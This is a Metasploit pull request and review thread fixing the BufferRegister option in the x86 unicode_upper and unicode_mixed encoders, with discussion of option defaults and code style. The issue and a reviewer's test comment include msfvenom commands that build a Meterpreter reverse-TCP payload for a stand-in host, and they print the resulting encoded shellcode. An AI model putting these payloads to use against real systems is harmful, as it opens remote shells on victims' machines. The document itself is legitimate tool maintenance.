### PR TITLE
Fix for issue #13372, buffer register option in unicode encoders

### LINKED ISSUE #13372: encoder/x86/unicode_upper incorrectly marks BufferRegister as optional
## Steps to reproduce

The `BufferRegister` is not marked as required:

```
msf5 > use encoder/x86/unicode_upper 
msf5 encoder(x86/unicode_upper) > show options

Module options (encoder/x86/unicode_upper):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   AllowWin32SEH   false            yes       Use SEH to determine the address of the stub (Windows only)
   BufferOffset    0                no        The offset to the buffer from the start of the register
   BufferRegister                   no        The register that pointers to the encoded payload
```

But it is actually required in the implementation:

https://github.com/rapid7/metasploit-framework/blob/6f73604183f48c6dbe8eb8952c73fd20a8439566/modules/encoders/x86/unicode_upper.rb#L32-L39

A simple command to test this is to use msvvenom without the BufferRegister supplied, which produces an error:

`msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.168.0.1 exitfunc=seh -e x86/unicode_upper -f raw`

This also happens with **x86/unicode_mixed**

## Expected behavior

Either:

- The options should be updated to show BufferRegister as required
- Alternatively we could default it to ECX, and make sure the two unicode ones still work since alpha_upper and alpha_mixed both default to ECX at runtime

### Metasploit version

Framework: 5.0.88-dev-6f73604183
Console  : 5.0.88-dev-6f73604183

### PR DESCRIPTION
**Pull request by VoidSec**
Fixes #13372 

- `encoder/x86/unicode_upper`
- `encoder/x86/unicode_mixed`

This should be enough to fix mentioned issue, unfortunately it doesn't seems to affect `msfvenom` usage

## Verification
- [x] Start `msfconsole`
- [x] `use encoder/x86/unicode_upper ` or  `use encoder/x86/unicode_mixed `
- [x] `show options`
- [x] **Verify** that the `BufferRegister` options is required and set to a default
- [x] **Verify** that ECX register can be used as default

```
msf5 > use encoder/x86/unicode_upper 
msf5 encoder(x86/unicode_upper) > show options

Module options (encoder/x86/unicode_upper):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   AllowWin32SEH   false            yes       Use SEH to determine the address of the stub (Windows only)
   BufferOffset    0                no        The offset to the buffer from the start of the register
   BufferRegister  ECX              yes       The register that points to the encoded payload
```

### CODE REVIEW

**Comment by gwillcox-r7** [comment]
Changed description to use the magical keyword "fixes" so that when this PR is closed it will also close the related issue.

**Comment by gwillcox-r7** [comment]
Okay well `msfvenom` seems to be fixed at least using the commands from #13372:

```
$ git checkout upstream/pr/13375
Note: switching to 'upstream/pr/13375'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:

  git switch -c <new-branch-name>

Or undo this operation with:

  git switch -

Turn off this advice by setting config variable advice.detachedHead to false

HEAD is now at aeebe6e0f1 fixing text description
$ git checkout -b land-pr13375
Switched to a new branch 'land-pr13375'
$ ./msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.168.0.1 exitfunc=seh -e x86/unicode_upper -f raw
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_upper
x86/unicode_upper succeeded with size 819 (iteration=0)
x86/unicode_upper chosen with final size 819
Payload size: 819 bytes
IAIAIAIA4444QATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLIX52KPKPM0S0CYIUNQ90C44K0PP0DK0RLL4KQBLTTK3BMXLOGGOZO6NQKOVLOL1QSLKRNLO0I18OLMM1Y7YRJRB2PW4KQBLP4K0JOL4KPLN1D8ISQ8KQJ1B1TK29O0M1XS4KQ9LXJCOJOYTK04TKKQ8V01KOFLI1XOLMKQ97NX9PSEL6M33MZXOK3MMTRUYT0XTK28MTM1XS1VTKLL0K4KQHMLM19CDKM4DKM18P59PDO4MTQKQK1Q1I0ZPQKOYP1O1OPZTKN2JKDM1M38NSOBM0KPQXT7BSOB1OQDRH0L2WMVLGU9IXKOZ0FXV0KQM0M0O9HD0TB0BHNICPRKM0KO8U2JLJ38WP5XM0M1QXM2M0N11L59YVB0B0PPB010PP10PPS8YZLO9OK0KOHUDWQZLPQFB73869754431KOIE3UWPD4KZKO0NLHT5ZLK8RGM0M0KPRJM02JKT26272HLBHYXH1OKOYEU3JXM0SN06TKNVRJ10S8KPLPM0KP1FQZKPRH28G423ZEKO8U4SPS2JKP1FQC1G1XKRXY8HQOKOZ5CSJXKPCMMXR81XKPQ0KPKP2JM0PPRHLKNOLOP0KOZ51GBHBU2N0MC1KOJ5QNQNKOLLNDLO4E40KOKOKOYYEKKOKOKOKQI3NI7V2UWQ93WKKNLNP2YZRJKPR3KOHU1ZM093AA
$ ./msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.168.0.1 exitfunc=seh -e x86/unicode_mixed -f raw
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 814 (iteration=0)
x86/unicode_mixed chosen with final size 814
Payload size: 814 bytes
IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB9lzHtBYpIpM0s0sY8eP1I0BDRkr0P0DK0RLLtKNrjtdK42MXLO87njnFnQKOdloLqQalYrnLKpeqVojmM1FgGr8rnrQGDKaBlPdKnjoLBk0LlQT8Ws18kQXQpQTK0Yo0IqXS4KNiLXxcnZQ9BkP4dK9qhVNQyoTlGQ8OLMKQEw08IPRUKF9s3MyhmkammTpuHdNxdKB8nDJaXSPfdKlL0KRkR8mLJahSRkLDdKYqvpRia4LdO4QKaKS1B9qJOayoiPqOOoNzDKN2xk4Mom38LsP2Ypip1XbWRSNRqOB4c8pLCGo6yw1yxhyo8PEhF0Jam09pnI8D1D200hKy502Kipio8U0jIzs87PThYpIqQXjbYpJq1LqyGvb0B0pPb0a0r0OPPPaXJJjoYOwpYoZ52w0jN026Og2H2y6EsDQQyoz5u5GPsDyz9opNzh1eXlwxrGipYpIpozM00jKTB6R7OxYrgi98OokOWecSZXM0anMfBkmfRJMpphkPLPm0ipOfRJkPc8QHeT1CXe9oYE3cpSaZYpR6qCOgPhM2giGXooIoIETCHxm0sMmXqHqXkPMpM0ipozm0R0phZklolONPYoGeb7C8RUpnPMC1KO6uqNaNkOzlnDzoe5rPIoIo9oxiuKioKOkO9qI3kywVRUVaUsUkYnlNmbWzQZypB3yofuRJm0fcAA
$ 
```

**Comment by gwillcox-r7** [comment]
Output now from `msfconsole` looks good:

```
msf5 > use encoder/x86/unicode_upper
msf5 encoder(x86/unicode_upper) > show options

Module options (encoder/x86/unicode_upper):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   AllowWin32SEH   false            yes       Use SEH to determine the address of the stub (Windows only)
   BufferOffset    0                no        The offset to the buffer from the start of the register
   BufferRegister  ECX              yes       The register that points to the encoded payload

msf5 encoder(x86/unicode_upper) > use encoder/x86/unicode_mixed
msf5 encoder(x86/unicode_mixed) > show options

Module options (encoder/x86/unicode_mixed):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   AllowWin32SEH   false            yes       Use SEH to determine the address of the stub (Windows only)
   BufferOffset    0                no        The offset to the buffer from the start of the register
   BufferRegister  ECX              yes       The register that points to the encoded payload

msf5 encoder(x86/unicode_mixed) > 
```

File: modules/encoders/x86/unicode_upper.rb [hunk 1]
```diff
@@ -12,7 +12,7 @@ def initialize
     super(
       'Name'             => "Alpha2 Alphanumeric Unicode Uppercase Encoder",
       'Description'      => %q{
-        Encodes payload as unicode-safe uppercase text.  This encoder uses
+        Encodes payloads as unicode-safe uppercase text.  This encoder uses
```
Comment (wvu-r7) [inline modules/encoders/x86/unicode_upper.rb:15]: I don't think this is a necessary change. You can encode only one payload at a time. It is specific language.

File: modules/encoders/x86/unicode_mixed.rb [hunk 2]
```diff
@@ -23,6 +23,11 @@ def initialize
         {
           'BlockSize' => 1,
         })
+    register_options(
+      [
+        OptBase.new('BufferRegister',[true, "The register that points to the encoded payload", "ECX"])
```
Comment (wvu-r7) [inline modules/encoders/x86/unicode_mixed.rb:28]: I think this should be the default in the library, as alphanumeric encoders most typically need a `BufferRegister` in lieu of a GetPC routine. The value can be configured with `DefaultOptions` per encoder.

Also, note that it's an `OptString`, not `OptBase`.

https://github.com/rapid7/metasploit-framework/blob/8a025f1b585c476fbd6c10325ac338d04286cd29/lib/msf/core/encoder/alphanum.rb#L20

cc @adfoster-r7, @gwillcox-r7

Comment (smcintyre-r7) [reply modules/encoders/x86/unicode_mixed.rb:28]: FWIW, if you did this there are blocks of code in [`x86/alpha_mixed`](https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/alpha_mixed.rb#L42) and `x86/alpha_upper` that would become dead code. Not 100% sure on the purpose special case, they default to ECX anyways so updating the condition might be sufficient.

File: modules/encoders/x86/unicode_upper.rb (hunk 1 above)
Comment (VoidSec) [reply modules/encoders/x86/unicode_upper.rb:15]: I was trying to remove it from the unicode_mixed and ended up adding an s to the unicode_upper, good catch.

File: modules/encoders/x86/unicode_mixed.rb (hunk 2 above)
Comment (VoidSec) [reply modules/encoders/x86/unicode_mixed.rb:28]: So, instead of adding the option to the specific module, would it be better to add it to the library?
Because it's unclear for me from the above discussion.

In the meanwhile I've fixed the `OptString` in my pull request

Comment (gwillcox-r7) [reply modules/encoders/x86/unicode_mixed.rb]: Sorry for the confusion caused, let me try simplifying what @wvu-r7 and @smcintyre-r7 were trying to say:

@wvu-r7 was stating that most alphanumberic encoders typically need the `BufferRegister`, since they don't have a `GetPC` routine, aka a routine that allows the shellcode to find itself in memory, and the `BufferRegister` option is a way for the shellcode to basically know "hey at register X there is the address where I start, so I know I that I should start decoding myself using the value of register X as my starting address".

He was also mentioning that another option might also be to set the `BufferRegister` field with `DefaultOptions` on a per encoder basis.

You fixed his final point with the last commit so I'm not going to go over that.

@smcintyre-r7 Was stating that if you were to move the `BufferRegister` option so that it was set within a library itself rather than on a per encoder basis, several pieces of code within `x86/alpha_mixed` and `x86/alpha_upper` would become useless junk code that wouldn't do anything beyond what the library was already doing.

He also mentioned that these encoders default to using `ECX` as the value for `BufferRegister`, so simply setting `BufferRegister` to be required might be sufficient.

In summary though I think the way you have done it so far makes the most sense until we decide whether or not we, the Metasploit team, want to start moving certain parts of what is currently encoder specific code into a common library, as this will likely affect several encoders and is something that is better fixed in a separate pull request (aka PR).

**Comment by gwillcox-r7** [comment]
@VoidSec Confirmed that you fixed the issues that @wvu-r7 raised. Ran the checks again as they were failing, they now seem to be working. Going to run some tests with some exploits that are in the framework already that use the encoders you have modified to ensure they still work okay, and if they do, then I think this should be good to merge.

**Comment by gwillcox-r7** [comment]
@VoidSec Hmm was going to run this with some old exploits originally but after testing one out I'm having a hard time getting to work even without your changes so I don't really have a good grounds to test this on. Those modules seem to be setting the `BufferRegister` manually themselves so I doubt your changes should break anything for them though.

Anyway going to merge this in so long. Sorry for the delays.

**Comment by gwillcox-r7** [comment]
# Release Notes
This PR adds a fix to the <code>encoder/x86/unicode_mixed</code> and <code>encoder/x86/unicode_upper</code> encoders to ensure that the mandatory option <code>BufferRegister</code> is always set. This fixes #13372, an issue that was preventing users from being able to Unicode encode payloads.

File: modules/encoders/x86/unicode_mixed.rb (hunk 2 above)
Comment (wvu-r7) [reply modules/encoders/x86/unicode_mixed.rb]: Sounds good to me.

File: modules/encoders/x86/unicode_mixed.rb [hunk 3]
```diff
@@ -23,6 +23,11 @@ def initialize
         {
           'BlockSize' => 1,
         })
+    register_options(
+      [
+        OptString.new('BufferRegister',[true, "The register that points to the encoded payload", "ECX"])
```
Comment (wvu-r7) [inline modules/encoders/x86/unicode_mixed.rb:28]: I didn't want to nitpick style, but please use consistent quoting and whitespace next time.

```suggestion
        OptString.new('BufferRegister', [true, 'The register that points to the encoded payload', 'ECX'])
```

Also, there is a typo in the library option's description that should be fixed:

```
wvu@kharak:/rapid7/metasploit-framework:master$ git grep BufferRegister lib
lib/msf/core/encoder/alphanum.rb:        OptString.new('BufferRegister', [ false, "The register that pointers to the encoded payload" ]),
wvu@kharak:/rapid7/metasploit-framework:master$
```

Option descriptions should match for a given name, which is important when overriding with `register_default_options` instead of `DefaultOptions`, since any discrepancies won't offer a good user experience.

Thank you for your patch. :)

cc @gwillcox-r7

Comment (gwillcox-r7) [reply modules/encoders/x86/unicode_mixed.rb:28]: @wvu-r7 Do you want me to raise a separate PR to fix this?

Comment (wvu-r7) [reply modules/encoders/x86/unicode_mixed.rb:28]: It's not a big deal, but now that I look at it, it is kind of bothering me. The descriptions should at least match, since we're reregistering the option to override it instead of using the designated `DefaultOptions` feature.

Comment (gwillcox-r7) [reply modules/encoders/x86/unicode_mixed.rb:28]: Ok let me open a PR to fix this up, as I think the library should:

1. Not be using double quotes for a literal string.
2. Should have `that pointers` changed to `that points` to fit in with other modules.

Comment (wvu-r7) [reply modules/encoders/x86/unicode_mixed.rb:28]: Yeah, and `,[` should be `, [`, at least.

Comment (wvu-r7) [reply modules/encoders/x86/unicode_mixed.rb:28]: I'm personally fine with double quotes for literal strings, but we have to be consistent about it. Single quotes generally have fewer side effects for literals.

In this case, `'BufferRegister'` was already using single quotes, so it makes sense to use them for the rest of the line. That is all.

Comment (wvu-r7) [reply modules/encoders/x86/unicode_mixed.rb:28]: Other than the option descriptions not matching, all these are nitpicks.

Comment (wvu-r7) [reply modules/encoders/x86/unicode_mixed.rb:28]: It is also partly the reason I suggested https://github.com/rapid7/metasploit-framework/pull/13375#discussion_r418710835 and `DefaultOptions`, but we didn't want to rework the library - that's fine.

Comment (wvu-r7) [reply modules/encoders/x86/unicode_mixed.rb:28]: Note that #9000 is also an option. I just can never remember the invocation.

Comment (gwillcox-r7) [reply modules/encoders/x86/unicode_mixed.rb:28]: @wvu-r7 Made #13380 to fix these issues.

File: modules/encoders/x86/unicode_mixed.rb (hunk 2 above)
Comment (VoidSec) [reply modules/encoders/x86/unicode_mixed.rb]: @gwillcox-r7 thank you for the explanation, now everything it's clear for me :)
